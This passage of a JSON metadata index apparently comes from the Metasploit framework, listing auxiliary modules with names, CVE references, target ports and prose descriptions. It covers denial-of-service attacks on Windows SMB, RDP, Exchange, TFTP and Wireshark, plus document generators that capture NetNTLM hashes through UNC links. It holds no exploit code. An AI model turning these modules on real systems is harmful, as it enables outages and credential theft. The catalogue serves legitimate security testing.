[ + "CVE-2011-0657", + "OSVDB-71780", + "MSB-MS11-030" + ], + "platform": "", + "arch": "", + "rport": 5355, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb", + "is_install_path": true, + "ref_name": "dos/windows/llmnr/ms11_030_dnsapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/nat/nat_helper": { + "name": "Microsoft Windows NAT Helper Denial of Service", + "fullname": "auxiliary/dos/windows/nat/nat_helper", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-10-26", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits a denial of service vulnerability\n within the Internet Connection Sharing service in\n Windows XP.", + "references": [ + "OSVDB-30096", + "BID-20804", + "CVE-2006-5614" + ], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/nat/nat_helper.rb", + "is_install_path": true, + "ref_name": "dos/windows/nat/nat_helper", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/rdp/ms12_020_maxchannelids": { + "name": "MS12-020 Microsoft Remote Desktop Use-After-Free DoS", + "fullname": "auxiliary/dos/windows/rdp/ms12_020_maxchannelids", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-16", + "type": "auxiliary", + "author": [ + "Luigi Auriemma", + "Daniel Godas-Lopez", + "Alex Ionescu", + "jduck ", + "#ms12-020" + ], + "description": "This module exploits the MS12-020 RDP vulnerability originally discovered and\n reported by Luigi Auriemma. The flaw can be found in the way the T.125\n ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result\n an invalid pointer being used, therefore causing a denial-of-service condition.", + "references": [ + "CVE-2012-0002", + "MSB-MS12-020", + "URL-http://www.privatepaste.com/ffe875e04a", + "URL-http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw", + "URL-http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg", + "URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html", + "EDB-18606", + "URL-https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/" + ], + "platform": "", + "arch": "", + "rport": 3389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-07 12:36:11 +0000", + "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb", + "is_install_path": true, + "ref_name": "dos/windows/rdp/ms12_020_maxchannelids", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms05_047_pnp": { + "name": "Microsoft Plug and Play Service Registry Overflow", + "fullname": "auxiliary/dos/windows/smb/ms05_047_pnp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account. Since the PnP\n service runs inside the service.exe process, this module\n will result in a forced reboot on Windows 2000. Obtaining\n code execution is possible if user-controlled memory can\n be placed at 0x00000030, 0x0030005C, or 0x005C005C.", + "references": [ + "CVE-2005-2120", + "MSB-MS05-047", + "BID-15065", + "OSVDB-18830" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms05_047_pnp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms06_035_mailslot": { + "name": "Microsoft SRV.SYS Mailslot Write Corruption", + "fullname": "auxiliary/dos/windows/smb/ms06_035_mailslot", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-07-11", + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers a kernel pool corruption bug in SRV.SYS. Each\n call to the mailslot write function results in a two byte return value\n being written into the response packet. The code which creates this packet\n fails to consider these two bytes in the allocation routine, resulting in\n a slow corruption of the kernel memory pool. These two bytes are almost\n always set to \"\\xff\\xff\" (a short integer with value of -1).", + "references": [ + "BID-19215", + "OSVDB-27644", + "CVE-2006-3942", + "URL-http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10", + "MSB-MS06-035" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms06_035_mailslot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Attack", + "description": "Run Denial of Service" + } + ] + }, + "auxiliary_dos/windows/smb/ms06_063_trans": { + "name": "Microsoft SRV.SYS Pipe Transaction No Null", + "fullname": "auxiliary/dos/windows/smb/ms06_063_trans", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module exploits a NULL pointer dereference flaw in the\n SRV.SYS driver of the Windows operating system. This bug was\n independently discovered by CORE Security and ISS.", + "references": [ + "OSVDB-27644", + "MSB-MS06-063", + "CVE-2006-3942", + "BID-19215" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms06_063_trans", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms09_001_write": { + "name": "Microsoft SRV.SYS WriteAndX Invalid DataOffset", + "fullname": "auxiliary/dos/windows/smb/ms09_001_write", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "j.v.vallejo " + ], + "description": "This module exploits a denial of service vulnerability in the\n SRV.SYS driver of the Windows operating system.\n\n This module has been tested successfully against Windows Vista.", + "references": [ + "MSB-MS09-001", + "OSVDB-48153", + "CVE-2008-4114", + "BID-31179" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms09_001_write", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms09_050_smb2_negotiate_pidhigh": { + "name": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", + "fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Laurent Gaffie ", + "hdm " + ], + "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows\tVista\n without SP1 does not seem affected by this flaw.", + "references": [ + "CVE-2009-3103", + "BID-36299", + "OSVDB-57799", + "MSB-MS09-050", + "URL-https://seclists.org/fulldisclosure/2009/Sep/39" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms09_050_smb2_negotiate_pidhigh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms09_050_smb2_session_logoff": { + "name": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference", + "fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sf " + ], + "description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing\n an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.\n Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.", + "references": [ + "CVE-2009-3103", + "OSVDB-57799", + "MSB-MS09-050" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms09_050_smb2_session_logoff", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms10_006_negotiate_response_loop": { + "name": "Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop", + "fullname": "auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Laurent Gaffie ", + "hdm " + ], + "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger\n this bug, run this module as a service and forces a vulnerable client\n to access the IP of this system as an SMB server. This can be accomplished\n by embedding a UNC path (\\HOST\\share\\something) into a web page if the\n target is using Internet Explorer, or a Word document otherwise.", + "references": [ + "CVE-2010-0017", + "OSVDB-62244", + "MSB-MS10-006", + "URL-http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-08-24 21:38:44 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms10_006_negotiate_response_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms10_054_queryfs_pool_overflow": { + "name": "Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS", + "fullname": "auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Laurent Gaffie ", + "jduck " + ], + "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows prior to the August 2010 Patch\n Tuesday. To trigger this bug, you must be able to access a share with\n at least read privileges. That generally means you will need authentication.\n However, if a system has a guest accessible share, you can trigger it\n without any authentication.", + "references": [ + "CVE-2010-2550", + "OSVDB-66974", + "MSB-MS10-054", + "URL-https://seclists.org/fulldisclosure/2010/Aug/122" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms10_054_queryfs_pool_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms11_019_electbowser": { + "name": "Microsoft Windows Browser Pool DoS", + "fullname": "auxiliary/dos/windows/smb/ms11_019_electbowser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Cupidon-3005", + "jduck " + ], + "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows Server 2003 that have been\n configured as a domain controller. By sending a specially crafted election\n request, an attacker can cause a pool overflow.\n\n The vulnerability appears to be due to an error handling a length value\n while calculating the amount of memory to copy to a buffer. When there are\n zero bytes left in the buffer, the length value is improperly decremented\n and an integer underflow occurs. The resulting value is used in several\n calculations and is then passed as the length value to an inline memcpy\n operation.\n\n Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and\n causes considerable damage to kernel heap memory. While theoretically possible,\n it does not appear to be trivial to turn this vulnerability into remote (or\n even local) code execution.", + "references": [ + "CVE-2011-0654", + "BID-46360", + "OSVDB-70881", + "MSB-MS11-019", + "EDB-16166", + "URL-https://seclists.org/fulldisclosure/2011/Feb/285" + ], + "platform": "", + "arch": "", + "rport": 138, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms11_019_electbowser", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/rras_vls_null_deref": { + "name": "Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference", + "fullname": "auxiliary/dos/windows/smb/rras_vls_null_deref", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-06-14", + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers a NULL dereference in svchost.exe on\n all current versions of Windows that run the RRAS service. This\n service is only accessible without authentication on Windows XP\n SP1 (using the SRVSVC pipe).", + "references": [ + "OSVDB-64340" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/rras_vls_null_deref", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Attack", + "description": "Run Denial of Service" + } + ] + }, + "auxiliary_dos/windows/smb/vista_negotiate_stop": { + "name": "Microsoft Vista SP0 SMB Negotiate Protocol DoS", + "fullname": "auxiliary/dos/windows/smb/vista_negotiate_stop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module exploits a flaw in Windows Vista that allows a remote\n unauthenticated attacker to disable the SMB service. This vulnerability\n was silently fixed in Microsoft Vista Service Pack 1.", + "references": [ + "OSVDB-64341" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/vista_negotiate_stop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smtp/ms06_019_exchange": { + "name": "MS06-019 Exchange MODPROP Heap Overflow", + "fullname": "auxiliary/dos/windows/smtp/ms06_019_exchange", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-11-12", + "type": "auxiliary", + "author": [ + "pusscat " + ], + "description": "This module triggers a heap overflow vulnerability in MS\n Exchange that occurs when multiple malformed MODPROP values\n occur in a VCAL request.", + "references": [ + "BID-17908", + "CVE-2006-0027", + "MSB-MS06-019" + ], + "platform": "", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb", + "is_install_path": true, + "ref_name": "dos/windows/smtp/ms06_019_exchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ssh/sysax_sshd_kexchange": { + "name": "Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service", + "fullname": "auxiliary/dos/windows/ssh/sysax_sshd_kexchange", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-17", + "type": "auxiliary", + "author": [ + "Matt \"hostess\" Andreko " + ], + "description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n crash.", + "references": [ + "OSVDB-92081", + "URL-https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html" + ], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb", + "is_install_path": true, + "ref_name": "dos/windows/ssh/sysax_sshd_kexchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/tftp/pt360_write": { + "name": "PacketTrap TFTP Server 2.2.5459.0 DoS", + "fullname": "auxiliary/dos/windows/tftp/pt360_write", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-29", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The PacketTrap TFTP server version 2.2.5459.0 can be\n brought down by sending a special write request.", + "references": [ + "CVE-2008-1311", + "OSVDB-42932", + "EDB-6863" + ], + "platform": "", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/tftp/pt360_write.rb", + "is_install_path": true, + "ref_name": "dos/windows/tftp/pt360_write", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/tftp/solarwinds": { + "name": "SolarWinds TFTP Server 10.4.0.10 Denial of Service", + "fullname": "auxiliary/dos/windows/tftp/solarwinds", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-05-21", + "type": "auxiliary", + "author": [ + "Nullthreat" + ], + "description": "The SolarWinds TFTP server can be shut down by sending a 'netascii' read\n request with a specially crafted file name.", + "references": [ + "CVE-2010-2115", + "OSVDB-64845", + "EDB-12683" + ], + "platform": "", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/tftp/solarwinds.rb", + "is_install_path": true, + "ref_name": "dos/windows/tftp/solarwinds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/wireshark/capwap": { + "name": "Wireshark CAPWAP Dissector DoS", + "fullname": "auxiliary/dos/wireshark/capwap", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-28", + "type": "auxiliary", + "author": [ + "Laurent Butti", + "j0sm1" + ], + "description": "This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well\n as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a\n packet correctly when an incorrect length is given.", + "references": [ + "CVE-2013-4074", + "OSVDB-94091", + "BID-60500" + ], + "platform": "", + "arch": "", + "rport": 5247, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/wireshark/capwap.rb", + "is_install_path": true, + "ref_name": "dos/wireshark/capwap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/wireshark/chunked": { + "name": "Wireshark chunked_encoding_dissector Function DOS", + "fullname": "auxiliary/dos/wireshark/chunked", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-02-22", + "type": "auxiliary", + "author": [ + "Matteo Cantoni " + ], + "description": "Wireshark crash when dissecting an HTTP chunked response.\n Versions affected: 0.99.5 (Bug 1394)", + "references": [ + "CVE-2007-3389", + "OSVDB-37643", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/wireshark/chunked.rb", + "is_install_path": true, + "ref_name": "dos/wireshark/chunked", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/wireshark/cldap": { + "name": "Wireshark CLDAP Dissector DOS", + "fullname": "auxiliary/dos/wireshark/cldap", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-01", + "type": "auxiliary", + "author": [ + "joernchen (Phenoelit)>" + ], + "description": "This module causes infinite recursion to occur within the\n CLDAP dissector by sending a specially crafted UDP packet.", + "references": [ + "CVE-2011-1140", + "OSVDB-71552", + "URL-https://www.wireshark.org/security/wnpa-sec-2011-04.html", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/wireshark/cldap.rb", + "is_install_path": true, + "ref_name": "dos/wireshark/cldap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/wireshark/ldap": { + "name": "Wireshark LDAP Dissector DOS", + "fullname": "auxiliary/dos/wireshark/ldap", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-03-28", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers\n to cause a denial of service (application crash) via a malformed packet.", + "references": [ + "CVE-2008-1562", + "OSVDB-43840" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/wireshark/ldap.rb", + "is_install_path": true, + "ref_name": "dos/wireshark/ldap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fileformat/badpdf": { + "name": "BADPDF Malicious PDF Creator", + "fullname": "auxiliary/fileformat/badpdf", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Assaf Baharav", + "Yaron Fruchtmann", + "Ido Solomon", + "Richard Davy - secureyourit.co.uk" + ], + "description": "This module can either creates a blank PDF file which contains a UNC link which can be used\n to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary\n code into an existing PDF document if possible.", + "references": [ + "CVE-2018-4993", + "URL-https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/fileformat/badpdf.rb", + "is_install_path": true, + "ref_name": "fileformat/badpdf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fileformat/multidrop": { + "name": "Windows SMB Multi Dropper", + "fullname": "auxiliary/fileformat/multidrop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Richard Davy - secureyourit.co.uk", + "mubix ", + "asoto-r7", + "hyp3rlinx", + "bcoles " + ], + "description": "This module dependent on the given filename extension creates either\n a .lnk, .scf, .url, .xml, .library-ms, or desktop.ini file which includes\n a reference to the specified remote host, causing SMB connections to be\n initiated from any user that views the file.", + "references": [ + "URL-https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018", + "URL-https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/", + "URL-https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/", + "URL-https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-02 01:28:52 +0000", + "path": "/modules/auxiliary/fileformat/multidrop.rb", + "is_install_path": true, + "ref_name": "fileformat/multidrop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fileformat/odt_badodt": { + "name": "LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator", + "fullname": "auxiliary/fileformat/odt_badodt", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-05-01", + "type": "auxiliary", + "author": [ + "Richard Davy - secureyourit.co.uk" + ], + "description": "Generates a Malicious ODT File which can be used with auxiliary/server/capture/smb or similar to capture hashes.", + "references": [ + "CVE-2018-10583", + "URL-https://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2018-06-06 11:26:20 +0000", + "path": "/modules/auxiliary/fileformat/odt_badodt.rb", + "is_install_path": true, + "ref_name": "fileformat/odt_badodt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fileformat/word_unc_injector": { + "name": "Microsoft Word UNC Path Injector", + "fullname": "auxiliary/fileformat/word_unc_injector", + "aliases": [ + "auxiliary/docx/word_unc_injector" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "SphaZ " + ], + "description": "This module modifies a .docx file that will, upon opening, submit stored\n netNTLM credentials to a remote host. It can also create an empty docx file. If\n emailed the receiver needs to put the document in editing mode before the remote\n server will be contacted. Preview and read-only mode do not work. Verified to work\n with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.", + "references": [ + "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-04-30 18:26:15 +0000", + "path": "/modules/auxiliary/fileformat/word_unc_injector.rb", + "is_install_path": true, + "ref_name": "fileformat/word_unc_injector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/dns/dns_fuzzer": { + "name": "DNS and DNSSEC Fuzzer", + "fullname": "auxiliary/fuzzers/dns/dns_fuzzer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "pello " + ], + "description": "This module will connect to a DNS server and perform DNS and\n DNSSEC protocol-level fuzzing. Note that this module may inadvertently\n crash the target server.", + "references": [], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-12-07 08:01:52 +0000", + "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb", + "is_install_path": true, + "ref_name": "fuzzers/dns/dns_fuzzer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ftp/client_ftp": { + "name": "Simple FTP Client Fuzzer", + "fullname": "auxiliary/fuzzers/ftp/client_ftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "corelanc0d3r " + ], + "description": "This module will serve an FTP server and perform FTP client interaction fuzzing", + "references": [ + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ftp/client_ftp.rb", + "is_install_path": true, + "ref_name": "fuzzers/ftp/client_ftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ftp/ftp_pre_post": { + "name": "Simple FTP Fuzzer", + "fullname": "auxiliary/fuzzers/ftp/ftp_pre_post", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", 